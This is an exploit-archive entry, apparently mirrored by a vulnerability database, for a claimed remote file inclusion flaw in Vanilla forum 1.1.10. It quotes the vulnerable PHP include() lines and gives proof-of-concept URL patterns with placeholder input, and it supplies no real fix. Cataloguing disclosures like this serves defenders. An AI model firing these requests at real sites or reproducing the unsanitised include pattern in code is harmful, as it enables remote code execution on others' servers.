Search...

Vanilla 1.1.10 <= Remote File Inclusion Vulnerability

2010-03-22T00:00:00

ID 1337DAY-ID-11395
Type zdt
Reporter eidelweiss
Modified 2010-03-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Vanilla-1.1.10 &lt;= Remote File Inclusion Vulnerability
=====================================================

Title: Vanilla-1.1.10 &lt;= Remote File Inclusion Vulnerability
Version: 1.1.10
link: http://php.opensourcecms.com/scripts/redirect/website.php?id=128
License: -

########################################################

Author: eidelweiss
Date: 2010/03/22
Contact: eidelweiss[at]cyberservices.com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
 Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)
Special Thank`s : AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)

########################################################

-=[ VULN ]=-

[-] include($Configuration['LANGUAGES_PATH'].$Configuration['LANGUAGE'].'/definitions.php');

[-] include($Configuration['APPLICATION_PATH'].'conf/language.php');

-=[ P0C ]=-

[+] PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
[+] PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]

################################################################
[ FIX ] Use Your Skill and Play Your Imagination
################################################################



#  0day.today [2018-02-05]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-11395", "lastseen": "2018-02-05T03:18:34", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-02-05T03:18:34", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-05T03:18:34", "rev": 2}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/11395", "description": "Exploit for unknown platform in category web applications", "title": "Vanilla 1.1.10 <= Remote File Inclusion Vulnerability", "cvelist": [], "sourceData": "=====================================================\r\nVanilla-1.1.10 <= Remote File Inclusion Vulnerability\r\n=====================================================\r\n\r\nTitle: Vanilla-1.1.10 <= Remote File Inclusion Vulnerability\r\nVersion: 1.1.10\r\nlink: http://php.opensourcecms.com/scripts/redirect/website.php?id=128\r\nLicense: -\r\n\r\n########################################################\r\n\r\nAuthor: eidelweiss\r\nDate: 2010/03/22\r\nContact: eidelweiss[at]cyberservices.com\r\nThanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris\r\n Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)\r\nSpecial Thank`s : AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)\r\n\r\n########################################################\r\n\r\n-=[ VULN ]=-\r\n\r\n[-] include($Configuration['LANGUAGES_PATH'].$Configuration['LANGUAGE'].'/definitions.php');\r\n\r\n[-] include($Configuration['APPLICATION_PATH'].'conf/language.php');\r\n\r\n-=[ P0C ]=-\r\n\r\n[+] PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]\r\n[+] PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]\r\n\r\n################################################################\r\n[ FIX ] Use Your Skill and Play Your Imagination\r\n################################################################\r\n\r\n\n\n# 0day.today [2018-02-05] #", "published": "2010-03-22T00:00:00", "references": [], "reporter": "eidelweiss", "modified": "2010-03-22T00:00:00", "href": "https://0day.today/exploit/description/11395"}

Vanilla 1.1.10 &lt;= Remote File Inclusion Vulnerability

Description

Exploit for unknown platform in category web applications

Vanilla 1.1.10 <= Remote File Inclusion Vulnerability